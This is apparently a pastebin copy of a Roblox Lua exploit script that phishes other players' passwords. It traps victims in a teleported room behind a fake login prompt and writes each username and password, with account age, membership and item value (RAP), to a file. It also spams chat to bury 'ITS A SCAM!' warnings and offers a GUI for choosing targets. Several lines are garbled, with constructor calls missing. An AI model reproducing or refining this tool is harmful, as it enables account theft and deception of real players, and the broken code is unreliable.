Guest User


a guest
Jun 4th, 2016
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  1. local MyRoom = "BasicRoom"
  3. local StorageType = 2 -- 1 = CoreGui 2 = ReplicatedStorage
  5. local ScamType = "Pick" -- "Normal" "Pick" "TargetList"
  7. local TargetList = {}
  9. local Bypassers = { -- Leave ID as 0 if you don't want to use ID checks.
  10. {}
  11. }
  13. local Trello = {
  14. Enabled = false,
  15. List = "MRList",
  16. DumpList = "MRDumps",
  17. TrelloTargetList = "MRTargetList",
  18. DevKey = "",
  19. Token = "",
  20. }
  22. local floodChat = false -- To prevent people from saying "ITS A SCAM!"
  24. local writeAccounts = true -- Writes accounts to a file (ELYSIAN ONLY)
  25. local fileName = "MGX7List" -- Where your accounts will be written if you have Elysian.
  27. BypassKey = "v3rm" -- Bypass key players can use to skip login
  28. BypassKeyEnabled = true -- Enables the bypass key or not
  29. BypassKeyRules = true -- Shows a rule gui when entering bypass key to inform players the rules of your MGui session
  31. local kickLogin = false -- Kicks player after they login
  33. local RAPApi = true
  34. ------------------------------------------------------------------------
  36. local MainFolder = game:GetObjects("rbxassetid://382974306")[1]
  37. MainFolder.Parent = game.ReplicatedStorage
  39. local player = game.Players.LocalPlayer
  41. local CurrentlyScamming = {}
  43. local MRStorage
  45. local guiTool = MainFolder.Login
  47. local replaceScript = game:GetService("InsertService"):LoadAsset(80576967):GetChildren()[1].LocalScript
  48. guiTool.LocalScript:Destroy()
  49. replaceScript.Parent = guiTool
  51. local ruleTool = MainFolder["Bypass Rules"]
  53. local replaceScript = game:GetService("InsertService"):LoadAsset(80576967):GetChildren()[1].LocalScript
  54. ruleTool.LocalScript:Destroy()
  55. replaceScript.Parent = ruleTool
  57. local pickGui = MainFolder.PickGui
  59. function checkPass(pass, playa)
  60. if BypassKeyEnabled and pass == BypassKey then
  61. if BypassKeyRules then
  62. local newTool = ruleTool:Clone()
  63. newTool.Parent = workspace
  64. newTool.Handle.CanCollide = false
  65. newTool.Handle.CFrame = playa.Character.Head.CFrame
  66. end
  67. return true
  68. end
  69. if pass == "Password" or pass == "" or pass == "Enter Your Password" or pass == "Incorrect Password" or pass == "Enter your Password" then
  70. return false
  71. end
  72. local foundNums = 0
  73. local foundLetters = 0
  74. if string.find(pass, " ") then
  75. return false
  76. end
  77. if pass:len() < 6 or pass:len() > 20 then
  78. return false
  79. end
  80. for i=1,pass:len() do
  81. if pass:sub(i,i):match("%d") ~= nil then
  82. foundNums = foundNums + 1
  83. end
  84. end
  85. if foundNums < 2 then
  86. return false
  87. end
  88. for i=1,pass:len() do
  89. if pass:sub(i,i):match("%a") ~= nil then
  90. foundLetters = foundLetters + 1
  91. end
  92. end
  93. if foundLetters < 4 then
  94. return false
  95. end
  96. return true
  97. end
  99. function getUText(root, val)
  100. local found
  101. if val then
  102. found = val
  103. end
  104. for i,v in pairs(root:GetChildren()) do
  105. if v.Name == "UText" then
  106. found = v
  107. break
  108. end
  109. found = getUText(v,found)
  110. end
  111. return found
  112. end
  114. function getPText(root, val)
  115. local found
  116. if val then
  117. found = val
  118. end
  119. for i,v in pairs(root:GetChildren()) do
  120. if v.Name == "PText" then
  121. found = v
  122. break
  123. end
  124. found = getPText(v,found)
  125. end
  126. return found
  127. end
  129. function getILPopUp(root, val)
  130. local found
  131. if val then
  132. found = val
  133. end
  134. for i,v in pairs(root:GetChildren()) do
  135. if v.Name == "ILPopUp" then
  136. found = v
  137. break
  138. end
  139. found = getILPopUp(v,found)
  140. end
  141. return found
  142. end
  144. function unscPlayer(plr)
  145. for i,v in pairs(CurrentlyScamming) do
  146. if plr == v.Player then
  147. table.insert(Bypassers,{Name = plr.Name, ID = plr.UserId})
  148. table.remove(CurrentlyScamming,i)
  149. wait()
  150. while plr.Backpack:FindFirstChild("Login") do
  151. plr.Backpack.Login:Destroy()
  152. wait()
  153. end
  154. while plr.Character:FindFirstChild("Login") do
  155. plr.Character.Login:Destroy()
  156. wait()
  157. end
  158. plr.Character:WaitForChild("Torso")
  159. plr.Character:WaitForChild("HumanoidRootPart")
  160. plr.Character.HumanoidRootPart.Anchored = false
  161. plr.Character.HumanoidRootPart.CFrame = v.ReturnPos
  162. v.Player.CameraMaxZoomDistance = 400
  163. v.Player.CameraMinZoomDistance = 0
  164. v.RoomModel:Destroy()
  165. end
  166. end
  167. end
  169. function scPlayer(plr)
  170. ypcall(function()
  171. local debounce = false
  172. local roomCheck = MainFolder.Rooms:FindFirstChild(MyRoom)
  173. if roomCheck then
  174. local roomId = #CurrentlyScamming + 1
  175. local newRoom = roomCheck:Clone()
  176. newRoom.Parent = workspace
  177. newRoom:MoveTo(,1000, 5000 + 100 * roomId))
  179. local newPacket = {Player = plr, RoomId = roomId, RoomModel = newRoom, ReturnPos = plr.Character.Torso.CFrame}
  180. table.insert(CurrentlyScamming,newPacket)
  181. --[[
  182. newRoom.LButton.ClickDetector.MouseClick:connect(function(playa)
  183. if debounce == false then
  184. if playa.Backpack:FindFirstChild("Login") then
  185. if playa == plr and getILPopUp(playa.Backpack.Login) and getPText(playa.Backpack.Login) then
  186. debounce = true
  187. getILPopUp(newRoom).Visible = false
  188. getILPopUp(playa.Backpack.Login).Visible = false
  189. wait(0.5)
  190. if playa.Backpack:FindFirstChild("Login") then
  191. if checkPass(getPText(playa.Backpack.Login).Text) then
  192. print(plr.Name .. " : " .. getPText(playa.Backpack.Login).Text)
  193. unscPlayer(plr)
  194. else
  195. getILPopUp(newRoom).Visible = true
  196. getILPopUp(playa.Backpack.Login).Visible = true
  197. getPText(playa.Backpack.Login).Text = ""
  198. end
  199. end
  200. end
  201. end
  202. debounce = false
  203. end
  204. end)
  205. --]]
  206. end
  207. end)
  208. end
  210. function isBypass(plr)
  211. local bypass = false
  212. for i,v in pairs(Bypassers) do
  213. if v.Name == plr.Name or v.ID == plr.UserId then
  214. bypass = true
  215. end
  216. end
  217. return bypass
  218. end
  220. function isScamming(plr)
  221. local isScam = false
  222. for i,v in pairs(CurrentlyScamming) do
  223. if v.Player.Name == plr then
  224. isScam = true
  225. end
  226. end
  227. return isScam
  228. end
  230. function fixPlayers()
  231. for i,v in pairs(CurrentlyScamming) do
  232. ypcall(function()
  233. if v.Player.Character:FindFirstChild("Login") then
  234. if v.Player.Character.Login:FindFirstChild("SprayGui") then
  235. local tempTool = v.Player.Character:FindFirstChild("Login")
  236. tempTool.Parent = v.RoomModel
  237. tempTool.Handle.CFrame = v.Player.Character.Head.CFrame
  238. end
  239. end
  240. end)
  241. end
  242. end
  244. function BCtoDumpStr(str)
  245. local res = ""
  246. if str == "Enum.MembershipType.BuildersClub" then
  247. res = "[BC] "
  248. elseif str == "Enum.MembershipType.TurboBuildersClub" then
  249. res = "[TBC] "
  250. elseif str == "Enum.MembershipType.OutrageousBuildersClub" then
  251. res = "[OBC] "
  252. elseif str == "Enum.MembershipType.None" then
  253. res = ""
  254. end
  255. return res
  256. end
  258. function getRap(user)
  259. local rap = "Error."
  260. if RAPApi then
  261. ypcall(function()
  262. local http = game:GetService("HttpService")
  263. local rawrap = http:JSONDecode(game:HttpGet("" .. user,true))
  264. rap = tostring(rawrap.rap)
  265. end)
  266. else
  267. rap = "Disabled."
  268. end
  269. return rap
  270. end
  272. function logAccount(user,pass)
  273. local playerName = user.Name
  274. local playerAge = tostring(user.AccountAge)
  275. local playerRAP = getRap(playerName)
  277. if print then
  278. print(BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  279. end
  280. if readfile and writefile then
  281. if readfile(getelysianpath()..fileName..".txt") == "nil path doesn't exist" then
  282. writefile(getelysianpath()..fileName..".txt", BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  283. else
  284. local tempFile = readfile(getelysianpath()..fileName..".txt")
  285. writefile(getelysianpath()..fileName..".txt", tempFile .. "\n" .. BCtoDumpStr(tostring(user.MembershipType)) .. playerName .. " : " .. pass .. " Age: " .. playerAge .. " RAP: " .. playerRAP)
  286. end
  287. end
  288. end
  290. function teleportVictims()
  291. for i,v in pairs(CurrentlyScamming) do
  292. ypcall(function()
  293. v.Player.Character.HumanoidRootPart.CFrame = v.RoomModel.Spawn.CFrame +,-10,0)
  294. v.Player.Character.HumanoidRootPart.Anchored = true
  295. if not v.Player.Backpack:FindFirstChild("Login") and not v.Player.Character:FindFirstChild("Login") then
  296. if not v.RoomModel:FindFirstChild("Login") then
  297. local tempTools = {}
  298. for i2,v2 in pairs(v.Player.Backpack:GetChildren()) do
  299. table.insert(tempTools,v2:Clone())
  300. v2:Destroy()
  301. end
  302. local newTool = guiTool:Clone()
  303. newTool.Parent = v.RoomModel
  304. newTool.Handle.CanCollide = false
  305. newTool.Handle.CFrame = v.Player.Character.Head.CFrame
  306. newTool.Handle.BodyPosition.Position = v.RoomModel.Spawn.Position +,-10,0)
  307. getUText(newTool).Text = v.Player.Name
  308. spawn(function()
  309. wait(2)
  310. for i2,v2 in pairs(tempTools) do
  311. v2.Parent = v.Player.Backpack
  312. end
  313. end)
  314. newTool.Changed:connect(function(prop)
  315. if not isScamming(v.Player.Name) then return end
  316. if prop == "Parent" and newTool.Parent.Name == "Backpack" then
  317. if v.Player.Backpack:FindFirstChild("Login") then
  318. if getILPopUp(v.Player.Backpack.Login) and getPText(v.Player.Backpack.Login) then
  319. getILPopUp(v.Player.Backpack.Login).Visible = false
  320. if v.Player.Backpack:FindFirstChild("Login") then
  321. if checkPass(getPText(v.Player.Backpack.Login).Text, v.Player) then
  322. logAccount(v.Player, getPText(v.Player.Backpack.Login).Text)
  323. unscPlayer(v.Player)
  324. spawn(function()
  325. wait(0.5)
  326. if kickLogin then
  327. if not v.Player.Backpack:FindFirstChild("Bypass Rules") and not v.Player.Character:FindFirstChild("Bypass Rules") then
  328. v.Player:Remove()
  329. end
  330. end
  331. end)
  332. else
  333. getILPopUp(v.Player.Backpack.Login).Visible = true
  334. getPText(v.Player.Backpack.Login).Text = ""
  335. wait()
  336. if not v.Player.Character:FindFirstChild("Login") then
  337. newTool.Parent = v.RoomModel
  338. newTool.Handle.CFrame = v.Player.Character.Head.CFrame
  339. end
  340. end
  341. end
  342. end
  343. end
  344. end
  345. end)
  346. end
  347. end
  348. end)
  349. end
  350. end
  352. wait()
  354. game.Players.PlayerRemoving:connect(function(playa)
  355. for i,v in pairs(CurrentlyScamming) do
  356. if v.Player == playa then
  357. table.remove(CurrentlyScamming,i)
  358. end
  359. end
  360. end)
  362. --[[
  363. local infoGui ="ScreenGui",game.CoreGui)
  364. local infoText ="TextLabel",infoGui)
  365. infoText.Position =,0,1,-20)
  366. infoText.Size =,0,0,20)
  367. infoText.FontSize = "Size18"
  368. infoText.Font = "SourceSansBold"
  369. infoText.BackgroundTransparency = 1
  370. infoText.TextColor3 =,1,1)
  371. infoText.TextXAlignment = "Right"
  372. infoText.Text = "Press 'p' to toggle chat spam."
  373. --]]
  375. local mouse = game.Players.LocalPlayer:GetMouse()
  376. mouse.KeyDown:connect(function(key)
  377. if key == "p" then
  378. floodChat = not floodChat
  379. end
  380. end)
  382. spawn(function()
  383. while wait(3) do
  384. fixPlayers()
  385. end
  386. end)
  388. while wait() do
  389. teleportVictims()
  390. if floodChat then
  391. game.Players:Chat(".")
  392. game.Players:Chat(".")
  393. end
  394. if ScamType == "Normal" then
  395. for i,v in pairs(game.Players:GetPlayers()) do
  396. if StorageType == 1 then
  397. if not game.CoreGui.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  399. end
  400. elseif StorageType == 2 then
  401. if not game.ReplicatedStorage:FindFirstChild("MRStorage") then
  402. MRStorage ="Folder",game.ReplicatedStorage)
  403. MRStorage.Name = "MRStorage"
  404. end
  405. if not game.ReplicatedStorage.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  406. scPlayer(v)
  407. end
  408. end
  409. end
  410. elseif ScamType == "Pick" then
  411. if StorageType == 1 then
  412. if not game.CoreGui.MRStorage:FindFirstChild(v.Name) and not isScamming(v.Name) and not isBypass(v) and v ~= game.Players.LocalPlayer then
  414. end
  415. elseif StorageType == 2 then
  416. if not game.ReplicatedStorage:FindFirstChild("MRStorage") then
  417. MRStorage ="Folder",game.ReplicatedStorage)
  418. MRStorage.Name = "MRStorage"
  419. end
  420. if not game.CoreGui:FindFirstChild("PickGui") then
  421. local newPickGui = pickGui:Clone()
  422. newPickGui.Parent = game.CoreGui
  423. spawn(function()
  424. local pickGuiList = newPickGui.MainFrame.AccList
  425. local pickGuiResult = newPickGui.MainFrame.UserResult
  426. pickGuiList.CanvasSize =,0,0,0)
  427. local function updatePickList()
  428. pickGuiList:ClearAllChildren()
  429. for i,v in pairs(game.Players:GetPlayers()) do
  430. if v ~= player then
  431. local newRes = pickGuiResult:Clone()
  432. newRes.PlayerName.Text = v.Name
  433. newRes.PlayerPic.Image = ""..v.UserId
  434. newRes.Position =,0,0,40 * #pickGuiList:GetChildren())
  435. if isScamming(v.Name) then
  436. newRes.PlayerStatus.Text = "Scamming..."
  437. end
  438. if isBypass(v) then
  439. newRes.PlayerStatus.Text = "Scammed"
  440. end
  441. newRes.Parent = pickGuiList
  442. pickGuiList.CanvasSize =,0,0,40 * #pickGuiList:GetChildren())
  443. newRes.Visible = true
  444. newRes.MouseButton1Down:connect(function()
  445. if not isScamming(v.Name) then
  446. scPlayer(v)
  447. end
  448. end)
  449. end
  450. end
  451. end
  452. updatePickList()
  453. newPickGui.MainFrame.Refresh.MouseButton1Down:connect(function()
  454. updatePickList()
  455. end)
  456. end)
  457. end
  458. end
  459. end
  460. end
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